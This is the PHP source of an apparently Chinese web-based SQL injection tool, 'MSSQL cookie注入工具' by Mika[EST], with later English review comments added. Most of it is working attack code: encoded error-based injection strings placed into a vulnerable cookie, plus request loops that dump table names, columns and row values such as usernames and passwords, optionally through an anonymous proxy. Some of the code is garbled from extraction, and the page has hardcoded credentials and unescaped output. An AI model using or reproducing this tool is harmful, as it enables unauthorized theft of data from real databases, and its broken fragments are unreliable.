MSSQL cookie注入工具[web版]

// Access gate: HTTP Basic auth against credentials that are literal strings in
// this file. NOTE(review): anyone who can read the source can pass the gate;
// the check uses `==` rather than `===`/hash_equals(), and both $_SERVER keys
// are read before the isset() test, so a request with no Authorization header
// raises undefined-index notices (warnings on PHP 8) before the 401 is sent.
$auth_ok=0;
$user=$_SERVER['PHP_AUTH_USER'];
$pass=$_SERVER['PHP_AUTH_PW'];
if(isset($user) && isset($pass) && $user=='admin' && $pass=='mika520'){
$auth_ok=1;
}
if(!$auth_ok)
{
      // Challenge the client and stop; nothing below runs unauthenticated.
      header('WWW-Authenticate: Basic realm="Top Secret Area"');
      header('HTTP/1.0 401 Unauthorized');
      exit;
}
// Form inputs, read straight from POST with no existence or type checks; each
// missing field emits a notice. Several of these ($url, $cookie, $referer,
// $proxy, table/field names) are echoed back into this page and written into a
// file name further down without any escaping or validation.
$cookie=$_POST['_cookie'];
$referer=$_POST['_referer'];
$url=$_POST['_url'];
$t_name=$_POST['_tablename'];
$tab_name=$_POST['_tabname'];
$field_name=$_POST['_fieldname'];
$proxy=$_POST['_proxy'];
$useproxy=$_POST['_useproxy'];
// $_action / $_btype are assigned here but the dispatch below re-reads $_POST
// into $action / $bstr instead.
$_action=$_POST['_action'];
$_btype=$_POST['_btype'];
?>


Asp+Mssql Cookie Sql Injection Tool



Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]


















Exploitable Url:    unspecifiedn"?>
Exploitable Cookie:    unspecifiedn"?>
Referer Url:    unspecifiedn"?>
>Num Type   >Char Type
οnclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables Of Current DataBase
>Explode Fields Of   />
>Explode Values Of   /> IN />
>Via Anonymous Proxy   >






///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
// NOTE(review): `global` at file scope is a no-op; these are already file-scope
// variables. The functions below declare their own `global` lists.
global $curl,$referer,$cookie,$url,$table_name,$field_name,$t_name,$tab_name;
 
// URL-encoded query fragments. Tokens spelled MFM_* are placeholders that the
// exploit_*/explode_* functions fill in with str_replace() before use; each
// fragment brackets its result in nchar(124) ('|') so find_value() can locate
// it in the response body. Two of these are dead in the current code path:
// $tab_exp (its loop in exploit_tab() is commented out) and $value_exp
// (exploit_value() is never called; the dispatch uses explode_value()).
// Defensive note: this only works when the target reflects database error
// text into the page (the usage notes below require error display to be on);
// parameterised queries and suppressed error detail close that channel.
$tab_exp="%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--";
$field_exp="%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--";
$value_exp="%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--";
$count_exp="%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--";
$count_table="%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--";
$count_column="%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Main dispatch. Runs only on a form submit with the three mandatory fields
// present; empty() also rejects the literal string "0".
if(array_key_exists("_submit",$_POST) && !empty($url) && !empty($cookie) && !empty($referer)){
$bstr=$_POST['_btype'];
$action=$_POST['_action'];
 
// Echo the submitted parameters back. They are user-controlled and are not
// passed through htmlspecialchars(), so this page reflects whatever was
// posted. The trailing `n` on these strings (here and throughout the file)
// looks like a `\n` whose backslash was lost when the page was extracted,
// and the "Target Cookie:" line appears to have lost its quote escaping too.
echo "
:::Attack Parameters:::
n";
echo "Target Url:$url
n";
echo "Target Cookie:"$cookie"
n";
echo "Referer Url:$referer
n";
echo "Injection Type:";
 
// Map the radio value to the 0/1 flag the exploit functions test via `global`.
// Any other value leaves $bstr as the raw POST string.
switch($bstr){
case 'num':
      echo "number
n";
      $bstr=0;// numeric type
      break;
case 'char':
      echo "character
n";
      $bstr=1;// character type
      break;
}
echo "Via Proxy:".((isset($useproxy) && !empty($proxy))? 'Yes':'No')."
n";
if(isset($useproxy) && !empty($proxy))
echo "Proxy Address:$proxy
n";
echo "Injection Action:";
 
// Select the action. die() here stops the page mid-output; the table/field
// names are only checked for emptiness, not for shape.
switch($action){
case 'exp_tabs':
      echo "Explode Table Names
n
n";
      exploit_tab();
      break;
case 'exp_fields':
      echo "Explode Table Fields
n";
      if(empty($t_name))
      die("Error:table name must be specified!
");
      // exploit_field() reads $table_name through `global`.
      $table_name=$t_name;
      echo "Table Name:$table_name
n
n";
      exploit_field();
      break;
case 'exp_values':
      echo "Explode Table Values
n";
      if(empty($tab_name))
      die("Error:table name must be specified!
");
      elseif(empty($field_name))
      die("Error:field name must be specified!
");
      // explode_value() reads $table_name and the comma-separated $field_name
      // through `global`.
      $table_name=$tab_name;
      echo "Table Name:$table_name
n";
      echo "Fields Name:".str_replace(","," ",$field_name)."
n
n";
      explode_value();
      break;
}
}
//      exploit_tab();
//      exploit_field();
//      explode_value();
///////////////////////////////////////////////////////////////////////////////////////
// Emits the opening markup of the results table and flushes so the browser
// receives output incrementally while requests are still in progress.
// The markup itself was stripped when this page was extracted; only the
// string skeletons remain.
function output_start()
{
echo "

n";
echo "
n";
echo "n";
flush();
}
// Writes one header cell, or opens/closes a header row when $th is the
// sentinel 'tr' / '/tr'. NOTE(review): the sentinels share the namespace
// with real values, so a field literally named "tr" would be misrendered.
// Cell markup was lost in extraction; each branch flushes after writing.
function output_th($th)
{
      switch($th){
      case 'tr':
            echo "";
            break;
      case '/tr':
            echo "n";
            break;
      default:
            echo "n";
            break;
      }
flush();
}
// Writes one data cell, or opens/closes a row when $td is 'tr' / '/tr'.
// Same sentinel collision as output_th(). Callers pass text taken from the
// remote response straight in, and nothing here escapes it, so content
// returned by the queried host is written into this page as-is.
function output_td($td)
{
switch($td){
      case 'tr':
            echo "";
            break;
      case '/tr':
            echo "n";
            break;
      default:
            echo "n";
            break;
      }
flush();
}
// Emits the closing markup of the results table and flushes.
// NOTE(review): $th and $td are interpolated here but are neither parameters
// nor globals of this function, so they are undefined (notice + empty string).
function output_end()
{
echo "
$th
$td

n";
flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段值函数
// Dumps the values of the comma-separated fields in $field_name from
// $table_name, one row per request, rendering them with the output_* helpers.
// Reads $bstr (0/1 quote-prefix flag), $table_name, $field_name, $cookie,
// $count_exp through `global`; $curl is set by init_session().
// The row count comes from a first probe; if that probe yields nothing the
// do/while still issues one request (loop body runs before the test).
function explode_value()
{
global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl;
$i=1;
$count=0;
$fields=explode(",",$field_name);
// Build the per-row fragment: one isNull(cast(...)) per field, joined with
// char(92) ('\'), then strip the trailing "+char(92)" (9 characters).
$sql_str=" And (Select Top 1 nchar(124)";
$sub_str='+isNull(cast([MIKA_FIELD] as varchar(8000)),char(32))';
foreach($fields as $field){
$new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str);
$sql_str.=$new_sub_str."+char(92)";
}
$sql_str=substr($sql_str,0,strlen($sql_str)-9);
$sql_str.="+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by ";
// $sub_strs is appended to without being initialised first (works in PHP,
// but would carry over stale entries if this were ever reused).
$sub_str="MIKA_FIELD desc";
foreach($fields as $field){
$sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str);
}
$sql_str.=implode(",",$sub_strs).")>0--";
//echo $sql_str."n";
$sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str);
 
// First request: record count. $count_exp is already URL-encoded, so it is
// not passed through urlencode() like the per-row fragment below.
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
output_start();
$re=find_value($new_cookie);
if($re)
{
$count=$re;
echo "the number of record in $table_name: $countn";
}
output_th('tr');
foreach ($fields as $field){
output_th($field);
}
output_th('/tr');
// One request per row; MIKA_NUM is the 1-based row index.
do{
 
$new_sql_str=str_replace('MIKA_NUM',$i,$sql_str);
//echo $sql_str."n";
if($bstr)
$new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie);
$re=find_value($new_cookie);
output_td('tr');
// Split the returned row on the char(92) separator. The delimiter literal
// below appears to have lost its escaping in extraction (likely "\\").
// find_value() returns 0 on a miss, so a genuine value of "0" is also
// treated as "no data" here.
if($re)
{
      $res=explode("\",$re);
      foreach($res as $ree){
      output_td($ree);
      }
}
output_td('/tr');
$i++;
}while($i<=$count);
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//另一种方式暴取表名的函数
// Lists user-table names (sysobjects xtype 'U', char(85)) one per request,
// ordered by id, laying them out eight to a row. Stops when a request returns
// nothing or repeats the previous result. Reads $bstr and $cookie via
// `global`; $curl is set by init_session().
// NOTE(review): output_start() is never called here, unlike the other dump
// functions, yet output_end() is.
function explode_tab(){
global $bstr,$curl,$cookie;
$num=1;
$i=0;
$old_re="";
$re="";
$words=" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--";
init_session();
 
// Header row: eight identical "Tables" cells.
output_th('tr');
for($i=0;$i<8;$i++)
output_th('Tables');
output_th('/tr');
output_td('tr');
do{
$new_words=str_replace('MIKA_NUM',$num,$words);
if($bstr)
$new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_words),$cookie);
$re=find_value($new_cookie);
// A repeated result means the ordered subquery has run out of rows;
// the comparison is loose (!=), so 0 (miss) and "" compare equal.
if($re!=$old_re)
      {
output_td($re);
if(($num % 8)==0)
{
output_td('/tr');
output_td('tr');
}
      }
else
break;
$old_re=$re;
$num++;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//初始化会话函数
// Creates the shared cURL handle in the global $curl: no response headers,
// body returned as a string, Referer and URL taken from the form inputs.
// Called at the start of every dump function; the handle is never closed.
// Reads $proxy, $referer, $url via `global`.
function init_session(){
global $proxy,$curl,$referer,$url;
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
// Optional HTTP proxy ("host:port" per the usage notes below).
if(isset($useproxy) && !empty($proxy))
curl_setopt($curl,CURLOPT_PROXY,"$proxy");
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//通用取值函数
// Sends one request with the given Cookie header on the global $curl handle
// and extracts the first '|'-bracketed token from the response body,
// returning it with the '|' characters removed, or 0 when nothing matched.
// The pattern below appears to have lost its `\|` escaping in extraction.
// Defensive note: the token only appears when the server reflects database
// error text into the page; the return value of curl_exec() (false on a
// transport error) is not checked before matching.
function find_value($cookie){
global $curl;
//echo $cookie."n";
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
 
//echo $content;
$re=preg_match("/(|.+|)/i",$content,$result);
if($re)
{
return str_replace('|','',$result[1]);
}
return 0;
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//字符串转换为msssql的16进制数值
 
// Converts a string to a 0x... hex literal, emitting each byte's hex value
// followed by "00" (i.e. a UTF-16LE-style encoding of ASCII text).
// NOTE(review): the for-loop header on the next line is truncated in this
// copy (the condition and increment are missing), so the block as shown does
// not parse; dechex() also yields a single digit for bytes below 0x10.
function str2sqlhex($str){
$temp="0x";
for($i=0;$i //echo $str[$i]."n";
$temp.=dechex(ord($str[$i]))."00";
}
//echo $temp."n";
return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//暴取表名函数
 
// Entry point for the "Explode Tables" action: prints the user-table count
// and then delegates the listing to explode_tab(). Reads $bstr, $cookie,
// $count_table via `global`; $tab_exp and $curl are declared but unused.
// The commented-out block below is the earlier not-in()-based listing; it
// is dead code (it also references $table_file, which is never opened).
function exploit_tab(){
global $bstr,$cookie,$tab_exp,$count_table,$curl;
$table=Null;
$temp=Null;
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_table,$cookie);
else
$new_cookie=str_replace('MIKA',$count_table,$cookie);
output_start();
if($re=find_value($new_cookie)){
echo "Number of tables:$ren";
}
/*do{
if($table==Null){
$new_url=str_replace('MFM_TABLES',"''",$tab_exp);
}
else{
$new_url=str_replace('MFM_TABLES',$temp,$tab_exp);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
 
$re=find_value($new_cookie);
if($re)
{
$table=$re;
if($temp==Null){
//$temp="'".$table."'";
$temp=str2sqlhex($table);
}else{
//$temp.=",".str2sqlhex($table);
$temp.=",".str2sqlhex($table);
}
fputs($table_file,"|------------+".$table."n");
echo "|------------+".$table."n";
}
}while($re);*/
explode_tab();
 
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段函数
// Lists the column names of $table_name via col_name() with a 1-based index,
// one per request, four to a row, stopping at the first empty result.
// Reads $bstr, $table_name, $cookie, $field_exp, $count_column via `global`.
// NOTE(review): the table name is substituted into the *global* $count_column
// template in place, so a second call in the same run would operate on an
// already-substituted string.
function exploit_field(){
global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl;
$old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp);
$count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column);
$num=1;
$i=0;
init_session();
// First request: column count.
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_column,$cookie);
else
$new_cookie=str_replace('MIKA',$count_column,$cookie);
output_start();
if($re=find_value($new_cookie)){
echo "Number of columns in $table_name:$ren";
}
// Header row: four identical "Fields" cells.
output_th('tr');
for($i=0;$i<4;$i++)
output_th('Fields');
output_th('/tr');
output_td('tr');
do{
$temp=$old_url;
$new_url=str_replace('MFM_NUM',"$num",$temp);
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
//echo $new_url."n";
$re=find_value($new_cookie);
// Response text is written into the page unescaped by output_td().
if($re){
output_td($re);
if(($num % 4)==0)
{
      output_td('/tr');
      output_td('tr');
}
}
$num++;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//老方式暴取字段值的函数
// Older single-field value dump (superseded by explode_value(); not reachable
// from the dispatch above). Walks the values of $field_name in $table_name
// by excluding already-seen values with not in(...), and mirrors the output
// to a text file. Reads $bstr, $table_name, $field_name, $cookie, $value_exp,
// $count_exp via `global`.
// NOTE(review): the output file name is built from the unvalidated form field
// $field_name, and the fopen() result is not checked before fputs(). If the
// count probe fails, $count is undefined and the loop condition compares
// against null.
function exploit_value(){
global $bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl;
$value=Null;
$temp=Null;
$count_num=1;
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
 
$re=find_value($new_cookie);
$record_file=fopen("records-$field_name.txt","w");
if($re)
{
$count=$re;
echo "the number of record in $table_name is: $countn";
fputs($record_file,"the number of record in $table_name is: $countn");
}
 
$old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp);
$old=str_replace('MFM_TABLE_NAME',$table_name,$old);
//echo $old."n";
do{
// First pass excludes the empty string; later passes exclude the hex
// literals accumulated in $temp.
if($value==Null){
$new_url=str_replace('MFM_VALUE',"''",$old);
}
else{
$new_url=str_replace('MFM_VALUE',$temp,$old);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
 
$re=find_value($new_cookie);
if($re)
{
$value=$re;
echo "|------------+ ".$value."n";
fputs($record_file,"|------------+ ".$value."n");
if($temp==Null){
//$temp="'".urlencode($value)."'";
//$temp=urlencode("'".urlencode($value)."'");
$temp=str2sqlhex($value);
//echo $temp."n";
}else{
//$temp.=","."'".urlencode($value)."'";
//$temp.=",".urlencode("'".urlencode($value)."'");
$temp.=",".str2sqlhex($value);
}
}else{echo "|------------+ Nonen";
fputs($record_file,"|------------+ Nonen");}
$count_num++;
}while($count_num<=$count);
fclose($record_file);
}
///////////////////////////////////////////////////////////////////////////////////////
?>
if(!array_key_exists('_submit',$_POST)){
?>

cookie注入辅助工具 by mika[EST]




只针对mssql数据库,且错误提示开启。

用法非常简单:

首先将实际获得cookie填入"exploitable cookie"栏里。并将可注入的字段后面加上MIKA这
个关键字,如下例所示,不要有空格。比如下面这个cookie:


"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"

其中myset这个字段没有过滤好,存在注入漏洞,那么你就需要在template后面加上MIKA这个关键字
因此$cookie全局变量就成了如下这个样子:


$cookie="my web=myset=templateMIKA; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";

"Exploitable Url"填存在漏洞的页面url地址。"referer url"填写http头里的referer字段的内容,一般情况下跟"Exploitable Url"
一样就可以了。


"Num Type"和"Char Type"是注入的类型,前者代表数值型,后者代表字符型,根据实际情况填写即可。

"Explode Tables Of Current DataBase" 爆取当前数据库的所有表名。

"Explode Fields Of" 爆取某个表的字段值,后面填上要暴取字段的表名.

"Explode Values Of" 暴取某个表的字段值。后面两个文本框,从左到又依次填写字段名和表名。其中字段数可以一次填写多个,以逗号(",")隔开,比如:

username,password,userid

"Via Anonymous Proxy" 是选择是否使用匿名HTTP代理,代理地址格式为"127.0.0.1:8080".


by mika[EST]


}
?>
